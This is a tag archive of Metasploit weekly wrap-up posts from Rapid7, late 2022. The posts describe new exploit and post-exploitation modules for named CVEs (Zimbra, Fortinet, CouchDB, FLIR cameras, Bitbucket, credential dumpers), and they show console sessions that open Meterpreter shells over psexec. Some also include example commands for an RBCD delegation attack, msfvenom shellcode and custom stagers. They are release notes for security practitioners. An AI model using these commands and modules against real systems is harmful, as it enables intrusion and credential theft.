Tag Archives: Metasploit

Metasploit Weekly Wrap-Up

2022-11-04 Brendan Watters

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2022/11/04/metasploit-weekly-wrap-up-182/

C is for cookie

Metasploit Weekly Wrap-Up

And that’s good enough for Apache CouchDB, apparently. Our very own Jack Heysel added an exploit module based on CVE-2022-24706 targeting CouchDB prior to 3.2.2, leveraging a special default ‘monster’ cookie that allows users to run OS commands.

This fake computer I just made says I’m an Admin

Metasploit’s zeroSteiner added a module to perform Role-based Constrained Delegation (RBCD) on an Active Directory network. If you need someone to vouch for your credentials as an Administrator on a local host and you have a set of specific permissions, this module will allow you to create your own friendly computer object to vouch for you!

Proving your Mettle while watching a fire

FLIR Cameras measure the heat given off by an exothermic reaction, but they also execute Metasploit’s ARM Meterpreter (formerly known as Mettle) payloads as root, thanks to a module by Samy Younsi that takes advantage of CVE-2022-37061, an unauthenticated command injection vulnerability in FLIR AX8 cameras up to and including 1.46.16.

That OpenSSL Vuln was certainly not greater than or equal to the hype

It was a tense and scary Halloween for many when it shouldn’t have been, thanks to a “cryptic” early announcement of an OpenSSL vulnerability that proved to be a bust. On AttackerKB Rapid7 researchers break down why this was not the vuln you feared, or much of a vuln at all.

New module content (5)

FLIR AX8 unauthenticated RCE by Samy Younsi (https://www.linkedin.com/in/samy-younsi), Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen), and h00die-gr3y, which exploits CVE-2022-37061 – This adds an exploit module that targets FLIR AX8 thermal cameras. A command injection vulnerability exists in the id POST parameter to the res.php endpoint, which can be leveraged by an unauthenticated attacker to achieve RCE as the root user.
Webmin File Manager RCE by faisalfs10x and jheysel-r7, which exploits CVE-2022-0824 – This adds a module that exploits improper access controls in Webmin File Manager. An authenticated attacker can coerce Webmin into downloading a malicious CGIcgi script from an attacker-controlled http server. After that, the attacker can further use File Manager utilities to set execute permissions on the cgi script, execute it, and achieve RCE as the root user.
Apache CouchDB Erlang RCE by 1F98D, Konstantin Burov, Milton Valencia (wetw0rk), _sadshade, and jheysel-r7, which exploits CVE-2022-24706 – A new module has been added to exploit CVE-2022-24706 an RCE within Apache CouchDB prior to 3.2.2 via the Erlang/OTP Distribution protocol, which used a default cookie of "monster" to allow users to connect and run OS commands.
Linux Gather ManageEngine Password Manager Pro Password Extractor by Charles Yost, Christophe De La Fuente, Rob Simon, and Travis Kaun – This post module gathers ManageEngine’s Password Manager Pro credentials from the local ManageEngine database.
#17181 from zeroSteiner – Adds a new auxiliary/admin/ldap/rbcd module which uses LDAP to set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the user provided delegate_to datastore option within Active Directory. This technique is used as part of Role Based Constrained Delegation (RBCD) attacks. Example usage: run rhost=192.168.123.13 [email protected] password=p4$$w0rd delegate_to=dc3$ action=WRITE delegate_from=fake_computer. This new module can be used in conjunction with the existing auxiliary/admin/dcerpc/samr_computer module to create the required fake computer account.

Enhancements and features (6)

#17155 from h00die – This PR updates version checking for the recent Remote mouse RCE module and updates the docs with a vulnerable version download link.
#17184 from adfoster-r7 – Updates the metashell upload/download commands to work for powershell and windows sessions.
#17186 from adfoster-r7 – Fixes broken file writes on windows targets when newlines are present within the uploaded file.
#17195 from adfoster-r7 – Fixes uploading binary files with identical names to a Windows shell session. Previously this would silently error and not write the new file contents, now the file contents will successfully be written out.
#17196 from bcoles – Adds new get_hostname library support for Windows sessions.
#17207 from memN0ps – Updates msfvenom and msfconsole to support formatting shellcode as a Rust array. Example usage: msfvenom -p windows/x64/exec cmd='calc.exe' -f rust.

Bugs fixed (3)

#17188 from zeroSteiner – Fixes a regression issue that stopped Python Meterpreter working for v3.1-3.3.
#17190 from zeroSteiner – This sets the bufptr parameter in multiple netapi32 railgun functions to the PLPVOID data type and consequently fixes a crash in the post/windows/gather/enum_domain_tokens module caused by improper data types being set for the bufptr parameter.
#17213 from bwatters-r7 – Fixes a bug that stopped the post/linux/gather/vcenter_secrets_dump module from loading.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-UP

2022-10-28 Shelby Pace

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/10/28/metasploit-weekly-wrap-up-180/

GLPI htmLawed PHP Command Injection

Metasploit Weekly Wrap-UP

Our very own bwatters-r7 wrote a module for an unauthenticated PHP command injection vulnerability that exists in various versions of GLPI. The vulnerability is due to a third-party vendor test script being present in default installations. A POST request to vendor/htmlawed/htmlawed/htmLawedTest.php directly allows an attacker to execute exec() through the hhook and test parameters, resulting in unauthenticated RCE as the www-data user. The GLPI project has released an advisory detailing patched versions available for download and also noting that this vulnerability has been seen exploited in the wild.

Vagrant Breakout Exploit

Community contributor bcoles added a module that exploits a built-in Vagrant feature to break out of a Vagrant box and gain access to the host system. Specifically, the shared project folder that exists on the host is mounted on the guest Vagrant box as a writable directory, and the project’s configuration file exists there. Every time a user on the host executes a vagrant command from within the project directory, the Ruby code within the config file gets executed. As a result, an attacker can add arbitrary code to the config file, wait for the user to run a vagrant command, and then gain a shell on the host system with the privileges of the user who ran the command. Since there is no intention to patch this issue, denying the shared folders feature for Vagrant projects is the best way to prevent this.

vCenter Secrets Dump Module

h00die and npm-cesium137-io submitted a post module that targets vCenter appliances. Using an elevated session, this module collects DC credentials, SSO user accounts and hashes, domain information, certificates, and more. The information gathered can be used to add new SSO admin users to vCenter, sign forged SAML assertions, and to dump more data via the auxiliary/gather/vmware_vcenter_vmdir_ldap module.

New module content (3)

GLPI htmLawed php command injection by bwatters-r7 and cosad3s, which exploits CVE-2022-35914 – This PR adds a module for CVE-2022-35914, a php command injection vulnerability in GLPI versions up to and including 10.0.2.
Vagrant Synced Folder Vagrantfile Breakout by bcoles – This PR adds a module that exploits a default Vagrant shared folder to append a Ruby payload to the Vagrant project Vagrantfile config file. The payload gets executed the next time the user runs a vagrant command.
vCenter Secrets Dump by h00die and npm-cesium137-io – This PR adds the post/linux/gather/vcenter_secrets_dump module to dump vCenter vmdir dcAccountPassword and platform certificates.

Enhancements and features (7)

#16979 from gwillcox-r7 – This improves the existing ldap_query module by allowing it to decode some data types into a human readable format.
#17050 from usiegl00 – This updates the osx stager to no longer write artifacts to disk when performing in-memory code loading.
#17071 from gwillcox-r7 – This adds additional predefined LDAP queries to the existing ldap_query module that can help enumerate specific information in support of certain attack paths.
#17128 from cgranleese-r7 – Updates auxiliary/scanner/smb/smb_enumshares to support specifying a share name such as run smb://Account:Password@TargetIP spidershares=true showfiles=true share=TargetShareName. Useful files are now also highlighted automatically.
#17164 from r3nt0n – This adds a new option, THEME_DIR to the exploit/multi/http/wp_crop_rce module that is useful when the current WordPress theme cannot be auto-detected by the module or when a user leverages other means of determining the theme.
#17176 from llamasoft – This updates the Python Meterpreter stage to calculate the necessary data for AES encryption at runtime which reduces the stage size by about 6,000 bytes.
#17185 from adfoster-r7 – Updates msfconsole’s tips command to include the analyze command, as well as hosts -R and services -R

Bugs fixed (2)

#17172 from bcoles – Fixes a bug in Msf::Post::File.append_file which caused file contents to be overwritten on non-Windows sessions.
#17187 from ErikWynter – Fixes an issue in the aerohive_netconfig_lfi_log_poison_rce exploit module that resulted in the vulnerable version 10.0r8 being flagged as non-vulnerable

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-10-21 Spencer McIntyre

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/10/21/metasploit-weekly-wrap-up-181/

Zimbra with Postfix LPE (CVE-2022-3569)

Metasploit Weekly Wrap-Up

This week rbowes added an LPE exploit for Zimbra with Postfix. The exploit leverages a vulnerability whereby the Zimbra user can run postfix as root which in turn is capable of executing arbitrary shellscripts. This can be abused for reliable privilege escalation from the context of the zimbra service account to root. As of this time, this vulnerability remains unpatched.

Zimbra RCE (CVE-2022-41352)

rbowes also added an RCE for Zimbra as well. This exploit can be used to remotely obtain the initial access necessary to exploit CVE-2022-3569 and escalate privileges to root. This exploit leverages a path traversal vulnerability to write a malicious JSP file to the web directory which yields code execution. The vulnerability does not require authentication however it should be noted that pax must not be present on the target in order for it to be exploitable. A Zimbra patch adds pax as a requirement, so either the patch must not have been applied or pax must have been explicitly removed.

FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)

Community member heyder submitted an exploit for multiple Fortinet products this week. The exploit involves an authentication bypass that is leveraged to establish an SSH session with the target. Unfortunately, the tested FortiGate v7.2.1 instance used during testing indicated that the target could not be used for SSH port forwarding.

Improved Qualys Scan Import Performance

Metasploit is capable of importing scan data produced by a variety of tools such as Qualys and Nessus. This week jmartin switched the XML parser used while processing Qualys scan files to obtain a dramatic performance improvement. Scans data which previously took hours to import takes only a few minutes now.

New module content (4)

Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera by Monte Crypto and h00die-gr3y, which exploits CVE-2017-7921 – This adds an auxiliary module that leverages an authentication bypass vulnerability in Hikvision IP cameras (CVE-2017-7921) to disclose information such as detailed hardware and software configuration, user credentials, and camera snapshots.
Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass. by Heyder Andrade and Zach Hanley, which exploits CVE-2022-40684 – This PR adds a remote code execution exploit module for CVE-2022-4068 affecting some Fortinet products
TAR Path Traversal in Zimbra (CVE-2022-41352) by Alexander Cherepanov, Ron Bowes, and yeak, which exploits CVE-2022-41352 – This adds a module that exploits a symlink-based path traversal vulnerability in cpio to get unauthenticated remote code execution as the zimbra user. This vulnerability is identified as CVE-2022-41352. The module generates a .tar file that will need to be emailed to any user on the target Zimbra server.
Zimbra sudo + postfix privilege escalation by EvergreenCartoons and Ron Bowes, which exploits CVE-2022-3569 – This adds a new module to exploit a vulnerable sudo configuration in Zimbra that permits the zimbra user to execute postfix as root. In turn, postfix can execute arbitrary shell scripts and get command execution as the root user. Currently, as of 2022-10-14, all versions of Zimbra are vulnerable.

Enhancements and features (4)

#16982 from h00die – Updates the Dell iDRAC login scanner to work with version 8 and version 9
#17135 from k0pak4 – This adds proper namespace to the hash identification library to avoid any potential collision with the constants defined previously.
#17140 from nfsec – The Metasploit Docker image’s Alpine version has been bumped from 3.12 to 3.15.
#17154 from jmartin-r7 – The process for importing Qualys scan data has been switched over from REXML to using Nokigiri::XML and XPath for improved performance.

Bugs fixed (1)

#17157 from k0pak4 – Setting the global options to set LHOST for all modules will now be properly respected when loading a module, whereas before only the globally set RHOST option would be respected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Wrap-Up

2022-10-14 Christophe De La Fuente

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/10/14/metasploit-wrap-up-155/

Spring Cloud Gateway RCE

Metasploit Wrap-Up

This week, a new module that exploits a code injection vulnerability in Spring Cloud Gateway (CVE-2022-22947) has been added by @Ayantaker. Versions 3.1.0 and 3.0.0 to 3.0.6 are vulnerable if the Gateway Actuator endpoint is enabled, exposed and unsecured. The module sends a specially crafted SpEL expression to this endpoint and gets command execution as the user running Spring Cloud Gateway. A first request is sent to create a route with a filter including the SpEL expression which will be parsed with a StandardEvaluationContext. A second request is sent to reload the route and trigger code execution.

pfSense pfBlockNG plugin unauthenticated RCE

Our very own @jheysel-r7 added a module that exploits an OS command injection vulnerability in pfSense’s pfBlockerNG plugin versions 2.1.4_26 and below and identified as CVE-2022-31814. The module sends an HTTP request with a payload in the Host: header, which will be executed by the PHP’s exec() function. This leads to unauthenticated remote command execution as root. Note that this pfSense module is not installed by default but is commonly used to block inbound connections from countries or IP ranges.

New module content (2)

Spring Cloud Gateway Remote Code Execution by Ayan Saha, which exploits CVE-2022-22947 – A new module has been added in for CVE-2022-22947, an unauthenticated RCE in Spring Cloud Gateway versions 3.1.0 and 3.0.0 to 3.0.6 when the Gateway Actuator endpoint is enabled, exposed and unsecured. Successful exploitation results in arbitrary code execution as the user running Spring Cloud Gateway.
pfSense plugin pfBlockerNG unauthenticated RCE as root by IHTeam and jheysel-r7, which exploits CVE-2022-31814 – A module has been added for CVE-2022-31814, an unauthenticated RCE in the pfSense plugin within pfBlockerNG that allows remote unauthenticated attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. Versions <= 2.1.4_26 are vulnerable. Note that version 3.X is unaffected.

Enhancements and features (2)

#17123 from h00die – The netrc and fetchmail modules have been updated to include documentation on how to use the modules.
#17092 from bcoles – This PR updates the netlm_downgrade module, providing documentation, extending it to support more session types, and fixing some bugs that were present which caused false-positive warnings to appear.

Bugs fixed (3)

#16987 from jmartin-r7 – Improves scanner/smb/smb_login to gracefully handle additional error conditions when connecting to target services.
#17075 from cdelafuente-r7 – The Windows secrets dump module was failing early for non-administrative users. This fixes the issue so the module now throws warnings where it was previously failing early. Now the module can complete the DOMAIN action whereas before it was failing prior to reaching this point.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

2022-10-07 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/10/07/metasploit-weekly-wrap-up-179/

Bofloader – Windows Meterpreter Gets Beacon Object File Loader Support

Metasploit Weekly Wrap-Up

This week brings a new and frequently requested feature to the Windows Meterpreter, the Beacon Object File loader. This new extension, bofloader, allows for users to execute Beacon Object Files as written for either Cobalt Strike or Sliver. This extension was provided by a group effort among community members kev169, GuhnooPlusLinux, R0wdyJoe, and skylerknecht.

Documentation is available on the new docs site which walks through using the new extension. Since the bofloader is a full-fledged extension, it can be used without loading stdapi which has been noted as an important setting (set AutoLoadStdapi false) for avoiding detection.

Once a Meterpreter session is loaded along with the bofloader extension, the execute_bof command becomes available. The user needs to specify a path to their BOF file and any necessary arguments.

msf6 exploit(windows/smb/psexec) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf6 exploit(windows/smb/psexec) > exploit


[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:62900) at 2022-10-07 12:10:21 -0400


meterpreter > load bofloader
Loading extension bofloader...

meterpreter                  
   ▄▄▄▄    ▒█████    █████▒  
  ▓█████▄ ▒██▒  ██▒▓██   ▒   
  ▒██▒ ▄██▒██░  ██▒▒████ ░   
  ▒██░█▀  ▒██   ██░░▓█▒  ░   
  ░▓█  ▀█▓░ ████▓▒░░▒█░      
  ░▒▓███▀▒░ ▒░▒░▒░  ▒ ░      
  ▒░▒   ░   ░ ▒ ▒░  ░     ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
   ░    ░ ░ ░ ░ ▒   ░ ░      
   ░          ░ ░  loader    
        ░                    


Success.
meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/whoami/whoami.x64.o
[*] No arguments specified, executing bof with no arguments.


UserName		SID
====================== ====================================
MSFLAB\DC$	S-1-5-18




GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
BUILTIN\Administrators                            Alias                    S-1-5-32-544                                  Enabled by default, Enabled group, Group owner, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\System Mandatory Level            Label                    S-1-16-16384                                  Mandatory group, Enabled by default, Enabled group, 




Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeAssignPrimaryTokenPrivilege Replace a process level token                     Disabled                      
...             


meterpreter >

If MinGW is available, BOF files can be compiled from source code using the –compile flag.

meterpreter > execute_bof ../../OutputStreams.c --compile
[*] No arguments specified, executing bof with no arguments.
[CALLBACK_OUTPUT]: message
[CALLBACK_ERROR]:  message

meterpreter >

Finally, BOF files which require arguments can be called if the user knows their format. This information would typically come from either reading the BOF file’s source code or documentation. In the following example, the nslookup BOF takes two UTF-8 strings, followed by one int16. The format string details can be found in the documentation along with a table for quick reference in the --help output.

meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/nslookup/nslookup.x64.o --format-string zzs metasploit.com 192.168.250.4 1
A metasploit.com 18.67.65.57
A metasploit.com 18.67.65.86
A metasploit.com 18.67.65.104
A metasploit.com 18.67.65.65
NS com f.gtld-servers.net
NS com a.gtld-servers.net
...

meterpreter >

WordPress Elementor RCE – CVE-2022-1329

This week community contributors AkuCyberSec, Ramuel Gall, and h00die landed a nice module for CVE-2022-1329, an authenticated vulnerability in the Elementor Website Builder Plugin for WordPress that allows unauthorized execution of several AJAX actions.

Any authenticated user can exploit this vulnerability to upload a PHP file onto the website. The module takes advantage of this vulnerability to request that the Elementor plugin try to install Elementor Pro from a user supplied zip file, which is something any user wih Subscriber permissions or higher can do. Once the PHP file is uploaded to the target website, the attacker can then browse to the page hosting their PHP file to get RCE as the www-data user.

Ubuntu Enlightment Mount Priv Esc – CVE-2022-37706

Its been a while since we last had a Linux LPE in the framework for Ubuntu, but thanks to some work from community contributors Maher Azzouzi and h00die, we have an exploit for CVE-2022-37706. This takes advantage of a bug within one of Linux’s window managers, called Enlightment, and occurs due to a command injection vulnerability in Enlightment’s enlightment_sys binary. Versions prior to Enlightment 0.25.4 are vulnerable and can be exploited by authenticated users who have a userland shell to gain arbitrary code execution as the root user.

Remote Mouse Server RCE – Unpatched

Community contributors 0RPHON, H4rk3nz0, and h00die brought us a nice vulnerability this week for an unauthenticated RCE via the Emote Interactive protocol, aka CVE-2022-3365. The bug occurs since the authentication for the Emote Interactive protocol never seemed to be enforced according to 0RPHON, the original bug discoverer. Attackers can utilize this vulnerability to gain unauthenticated RCE as the user running Remote Mouse Server. Note that whilst a CVE is assigned, the bug is still unpatched at the time of writing.

New module content (6)

Ubuntu Enlightenment Mount Priv Esc by Maher Azzouzi and h00die, which exploits CVE-2022-37706 – This PR adds a local privilege escalation module. It exploits a cmd injection vulnerability in the window manager, Enlightenment, on Ubuntu.
WordPress Plugin Elementor Authenticated Upload Remote Code Execution by AkuCyberSec, Ramuel Gall, and h00die, which exploits CVE-2022-1329 – This PR adds a new authenticated exploit module against 3 versions of Elementor, a plugin for WordPress. Any user account can use this exploit. It was rated a 9.9 CVSS score and was assigned CVE-2022-1329.
Remote Mouse RCE by 0RPHON, H4rk3nz0, and h00die, which exploits CVE-2022-3365 – This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server, achieving unauthenticated code execution as the user running the server.
Windows Gather MobaXterm Passwords by cn-kali-team – This module will determine if MobaXterm is installed on the target system and, if it is, it will try to dump all saved session information from the target. The passwords for these saved sessions will then be decrypted where possible.
RedisDesktopManager credential gatherer by cn-kali-team – This PR adds a post module leveraging the existing PackRat library to pull credentials from RedisDesktopManager installations.
Delinea Thycotic Secret Server Dump by npm-cesium137-io – This PR adds a post exploitation module that exports and decrypts Thycotic Secret Server credentials.

Enhancements and features (3)

#16995 from Invoke-Mimikatz – This PR adds a new extension for the C (x86/x64) Meterpreter payload. The extension is called bofloader and can be used to execute COFF files (also known as Beacon Object Files) in the context of the Meterpreter session. It currently adds only one command, bof_cmd, to Meterpreter.
#17086 from bwatters-r7 – This PR bumps Metasploit-payloads to a level that allows support for COFF loading per https://github.com/rapid7/metasploit-framework/pull/16995
#17108 from k0pak4 – Updates the azure_ad_login auxiliary module to check for disabled accounts.

Bugs fixed (3)

#17072 from smashery – This PR fixes a regression discovered when session interaction hangs because a file slated for cleanup is in use, so the framework side times out, but the shell side does not. The fix also includes more robust handling for shell tokens in all types of shells.
#17078 from cgranleese-r7 – This PR updates the deprecated report_auth_info method calls in the modules/auxiliary/scanner/rservices/ modules to now make use of create_credential instead.
#17091 from bcoles – Fixes module metadata for stability and reliability for several modules.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-09-30 Dean Welch

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/09/30/metasploit-weekly-wrap-up-178/

Veritas Backup Exec Agent RCE

Metasploit Weekly Wrap-Up

This module kindly provided by c0rs targets the Veritas Backup Exec Agent in order to gain RCE as the system/root user.
The exploit itself is actually a chain of 3 separate CVEs (CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878) which only makes it more impressive.
While you’re patching, why not take the time to test your backups too.

Hikvision IP Camera user impersonation

This vulnerability has been present in Hikvision products since 2014 and comes to us courtesy of h00die-gr3y.
The main culprit here is in Hikvisions authentication mechanism which allows you to login as any valid user using only their username and from that point this module allows you to set a new password for your chosen username so now you can log in "legitimately".

New module content (6)

Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic by Monte Crypto and h00die-gr3y, which exploits CVE-2017-7921 – A new module has been added in for CVE-2017-7921, an improper authentication logic bug in HikVision cameras. Successfully exploiting this vulnerability allows unauthenticated attackers to impersonate any valid user on the affected camera, which can be used to gain full control over the camera.
Netfilter nft_set_elem_init Heap Overflow Privilege Escalation by Arthur Mongodin and Redouane NIBOUCHA, which exploits CVE-2022-34918 – This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel.
qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE) by Giacomo Casoni, Leon Trappett (thepcn3rd), and Rishal Dwivedi (Loginsoft), which exploits CVE-2020-7246 – Adds an exploit that targets an authenticated arbitrary file upload vulnerability to gain code execution on qdPM 9.1 and lower.
Veritas Backup Exec Agent Remote Code Execution by Alexander Korotin, which exploits CVE-2021-27878 – This module exploits a chain of the vulnerabilities CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878 in Veritas Backup Exec Agent which leads to remote code execution with privileges of system or root user.
Mobile Mouse RCE by CHOKRI HAMMEDI and h00die – This PR includes a module that uses default configuration in Unified Remote to spawn a run prompt and return a shell.
Wifi Mouse RCE by H4RK3NZ0, REDHATAUGUST, and h00die, which exploits CVE-2022-3218 – A new module has been added for CVE-2022-3218, an unpatched (at the time of publication) authentication bypass in WiFi Mouse (Mouse Server) from Necta LLC which can be used to gain RCE as the user running Wifi Mouse (Mouse Server).

Enhancements and features (2)

#16981 from bcoles – This PR fixes several bugs as well as style and documentation inconsistencies as well as implementing new library methods.
#17048 from bcoles – :
This PR Updates the enum_token module by adding documentation, clarifying the description, improving efficiency, and leveraging library code.

Bugs fixed (3)

#16994 from zeroSteiner – Fixes multiple issues with registry manipulation on opened sessions.
#17054 from zeroSteiner – Fixes a crash when using the info and generate commands for adapted single (unstaged) payloads – such as cmd/windows/powershell/meterpreter/reverse_tcp.
#17073 from cgranleese-r7 – Fixes a bug where sessions opened by running one of the rexec_login / rlogin_login / rsh_login modules would die after module completion.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-09-23 Jeffrey Martin

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/09/23/metasploit-weekly-wrap-up-177/

Have you built out that awesome media room?

Metasploit Weekly Wrap-Up

If your guilty pleasures include using a mobile device to make your home entertainment system WOW your guests, you might be using Unified Remote. I hope you are extra cautious about what devices you let on that WiFi network. A prolific community member h00die added a module this week that uses a recently published vulnerability from H4RK3NZ0 to leverage an unprotected configuration page exposed on the media service, combined with just a little bit of protocol info the module makes that media server a prime target for pranks and other less friendly activities by guests on the network.

Finding the needles in that Linux memory stack

Brought to you by the combined efforts of many members of the Metasploit Community, Linux meterpeter payloads now offer a new way to hunt down passwords in memory on all those delicious Linux sessions you gather with Metasploit. The new post/linux/gather/mimipenguin module hunts down clear text passwords in Linux memory based on MimiPenguin.

We all love to share code with the public

A new module this week makes sharing public code risky business if you are using a bitbucket server to host that repository. Checkout out the nitty gritty in our blog post from earlier this week.

Metasploit plays well with others

Last week’s update brought with it an awesome way to utilize Metasploit with payload generated by Sliver that even ranked a call out in their latest release notes. Great to see the community promoting these updates for more people to learn about and utilize.

New module content (4)

VICIdial Multiple Authenticated SQLi by h00die, which exploits CVE-2022-34878 – This PR adds a module which exploits several authenticated sqli in VICIdial (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878).
Bitbucket Git Command Injection by Jang, Ron Bowes, Shelby Pace, and TheGrandPew, which exploits CVE-2022-36804 – Adds an exploit for CVE-2022-36804 which is an unauthenticated RCE in Bitbucket.
Unified Remote Auth Bypass to RCE by H4RK3NZ0 and h00die, which exploits CVE-2022-3229 – This adds an exploit module to exploit an authentication bypass to achieve remote code execution in Unified Remote on Windows. Note that the latest version (3.11.0.2483) is vulnerable, which makes it a 0-Day.
MimiPenguin by Shelby Pace, bcoles, and huntergregal, which exploits CVE-2018-20781 – This adds a port of Mimipenguin to Metasploit. Relying on mem_search() and mem_read(), this searches the memory regions of various processes for needles that are found near passwords in cleartext. Using the locations for all of the needles found, this will search the nearby regions for possible passwords.

Enhancements and features (6)

#16940 from adfoster-r7 – Rewrites Metasploit’s datastore to fix multiple bugs and edge cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again. Explicitly clearing a datastore value can be done with the set --clear OptionName command. Modules that require protocol specific option names such as SMBUser/FTPUser/BIND_DN/etc can now be consistently set with just username/password/domain options, i.e. set username Administrator instead of set SMBUser Administrator. This rewrite is currently behind a feature flag which can be enabled with features set datastore_fallbacks true.
#17002 from bcoles – The lib/msf/core/post/windows/accounts.rb, lib/msf/core/post/windows/ldap.rb, and lib/msf/core/post/windows/wmic.rb libraries have been updated to replace calls to load_extapi with ExtAPI compatibility checks which will check if the session supports ExtAPI, since if the sessions supports ExtAPI, it should already be loaded.
#17003 from bcoles – enum_patches has had its code updated to output the patches enumerated as a table and store the results long term in a CSV file. Additionally, a check has been added to see if the current session supports the required Meterpreter extension compatibility prior to trying to run the module. Finally, the code and documentation have been cleaned up and modernized.
#17015 from jmartin-r7 – Updates auxiliary/scanner/http/http_login to report login success when the http status code is in the range 200,201,300-308. This functionality is user-configurable with set HttpSuccessCodes 200.
#17049 from bcoles – Adds Notes module meta information and replaces custom get_members method with get_members_from_group from the Post API.
#17051 from bcoles – Adds module documentation, notes for module meta information, and improves module error handling.

Bugs fixed (3)

#17023 from zeroSteiner – The post/windows/manage/rollback_defender_signatures module has been updated to work on WoW64 sessions, and has had its code updated so that the default action is now a valid option.
#17036 from zeroSteiner – Fixes a bug where the sessions command would show the connection as coming from losthost 127.0.0.1, instead of the correct peer host address for reverse_http Meterpreter sessions.
#17052 from adfoster-r7 – Fixes an error in Metasploit-framework when the host machine has OpenSSL 3.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-09-16 Zachary Goldman

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2022/09/16/metasploit-weekly-wrap-up-176/

BYOS: Bring your own stager

Metasploit Weekly Wrap-Up

We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.

Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the shellcode_file option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
                                                    ng-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/x64/custom/reverse_tcp):

   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   EXITFUNC        thread                   yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           10.5.135.101             yes       The listen address (an interface may be specified)
   LPORT           4567                     yes       The listen port
   SHELLCODE_FILE  x64_shell_bind_4444.bin  no        Shellcode bin to launch


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] 10.5.132.159:445 - Connecting to the server...

<hacking intensifies>

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
